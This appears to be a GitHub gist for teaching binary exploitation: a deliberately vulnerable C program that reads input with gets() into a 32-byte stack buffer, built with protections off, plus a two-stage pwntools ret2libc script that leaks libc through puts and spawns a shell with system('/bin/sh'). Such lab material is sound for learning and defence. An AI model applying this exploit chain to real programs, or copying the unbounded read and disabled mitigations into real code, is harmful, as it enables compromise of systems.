@moyix
Created November 8, 2023 02:52
Buffer overflow with two ROP chains
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
// Build:
// gcc -gdwarf-4 -fcf-protection=none -no-pie -fno-stack-protector basicbof.c -o basicbof
// To give us a pop rdi gadget
// Never called from main(); it exists only so that a usable gadget is
// present in the binary's own .text. The immediate 0xc35f is emitted as
// the bytes 5f c3, which decode as `pop rdi ; ret` when jumped to at the
// 0x5f byte. This depends on the compiler materialising the constant as
// an inline immediate (unoptimised build) — presumably why no -O flag
// appears in the build line above.
void dosomething() {
    int x = 0xc35f;  // 0x5f = pop rdi, 0xc3 = ret
    return;
}
// Intentionally vulnerable target for the pwntools script below.
// gets() has no length argument, so a line longer than the 32-byte
// buffer runs past it onto the saved registers and return address on
// the stack. The build line disables the mitigations that would
// otherwise detect or complicate this: -fno-stack-protector (no
// canary), -no-pie (fixed code/GOT addresses), -fcf-protection=none
// (no CET). gets() was removed from the language in C11;
// fgets(buf, sizeof buf, stdin) is the bounded replacement in real code.
int main(void) {
    char buf[32] = {0};
    puts("Hello!");
    gets(buf);   // unbounded read into a fixed 32-byte stack buffer
    return 0;
}
# Companion script for basicbof.c above: a two-stage ret2libc exploit.
# Stage 1 leaks the runtime address of puts through its GOT entry to
# recover where libc is loaded; stage 2 returns into system("/bin/sh").
# Every constant here is tied to that exact -no-pie,
# -fno-stack-protector, -fcf-protection=none build and the host's libc;
# any one of those mitigations left on would change or break the chain
# (canary: overwrite detected before return; PIE: gadget and GOT
# addresses no longer fixed).
from pwn import *
p = process('./basicbof')
# The libc the target will load; symbol offsets are read from this file.
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
print("puts@plt:", hex(p.elf.plt['puts'])) # puts@PLT
print("puts@got:", hex(p.elf.got['puts']))# puts@GOT
# 0x38 bytes reach the saved return address: 32-byte buf plus stack
# slack and the saved frame pointer (layout is compiler-specific and
# presumably taken from this particular build).
padding = b'A'*0x38
# Address of the `pop rdi ; ret` bytes embedded by dosomething(); a
# fixed address because the binary is built -no-pie.
pop_rdi_gadget = 0x40113d
# Stage 1: puts(puts@got) prints puts' resolved libc address, then
# returns into main so the program asks for input a second time.
rop_chain = (p64(pop_rdi_gadget) + p64(p.elf.got['puts']) +
p64(p.elf.plt['puts']) + p64(p.elf.symbols['main']))
print(p.readline())  # "Hello!"
p.sendline(padding + rop_chain)
puts_str = p.readline()
print("puts(puts@got) =>", puts_str.hex())
# Drop the trailing newline puts appends; the remaining bytes are the
# pointer in little-endian order.
real_puts_addr = int.from_bytes(puts_str[:-1], byteorder='little')
# libc base = leaked runtime address - static offset of puts in this libc.
libc_base = real_puts_addr - libc.symbols['puts']
print("libc base:", hex(libc_base))
system_addr = libc_base + libc.symbols['system']
print("system_addr:", hex(system_addr))
# NOTE(review): `data` is presumably the raw file image, so this is a
# file offset rather than a virtual offset; the two only coincide when
# the containing segment is mapped at its file offset — confirm for
# this libc.
bin_sh_offset = libc.data.find(b'/bin/sh\x00')
bin_sh_addr = libc_base + bin_sh_offset
print("/bin/sh addr:", hex(bin_sh_addr))
# The lone `ret` byte right after `pop rdi`, used as a single-ret
# gadget — presumably to keep the stack 16-byte aligned on entry to
# system().
ret = pop_rdi_gadget + 1
print("ret gadget:", hex(ret))
# Stage 2: system("/bin/sh").
new_rop_chain = (p64(pop_rdi_gadget) + p64(bin_sh_addr) +
p64(ret) + p64(system_addr))
print(p.readline())  # second "Hello!" from the restarted main
p.sendline(padding + new_rop_chain)
p.interactive()  # hand the resulting shell to the terminal